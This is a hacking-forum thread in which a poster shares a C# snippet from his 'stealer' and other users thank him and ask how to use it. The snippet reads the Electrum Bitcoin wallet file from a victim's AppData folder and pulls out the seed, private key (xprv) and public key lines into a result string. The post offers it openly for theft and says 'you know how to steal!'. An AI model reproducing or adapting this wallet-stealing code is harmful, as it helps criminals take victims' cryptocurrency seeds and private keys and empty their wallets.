Jasmine 17 This is basic and not FUD :pepo: [hide] [align=center] string EWalletToParse = strAppData + "\Electrum\wallets\default_wallet"; string EWalletParsed = "Electrum BTC Wallet\n"; if (File.Exists(EWalletToParse)) { using (StreamReader sr = new StreamReader(EWalletToParse)) { while (sr.Peek() >= 0) { string s = sr.ReadLine(); { if (s.Contains("\"seed\"")) EWalletParsed += s + "\n"; if (s.Contains("\"type\"")) EWalletParsed += s + "\n"; if (s.Contains("\"xprv\"")) EWalletParsed += s + "\n"; if (s.Contains("\"xpub\"") && !EWalletParsed.Contains(s)) EWalletParsed += s + "\n"; } } } result += EWalletParsed; } [/hide][/align] This is a snippet of my stealer. I chose it because its very simple Its self explaining if u know BTC u will know what we r stealing if not you know how to steal! Quote Share this post Link to post Share on other sites
mranon1111 3 Thanks Bro ! Edit : Can you give more Details ? Quote Share this post Link to post Share on other sites
mooonfamily2k11 6 Thanksss!! How to use it? ever find out how to use it? Quote Share this post Link to post Share on other sites
jackmichskr 1 Thanks Bro ! Edit : Can you give more Details ? Quote Share this post Link to post Share on other sites
crackzniackru 0 This is basic and not FUD :pepo: This is a snippet of my stealer. I chose it because its very simple Its self explaining if u know BTC u will know what we r stealing if not you know how to steal! thanks bro, pretty helpful Quote Share this post Link to post Share on other sites
Snakes 0 For real? This stuff kinda have strong security Quote Share this post Link to post Share on other sites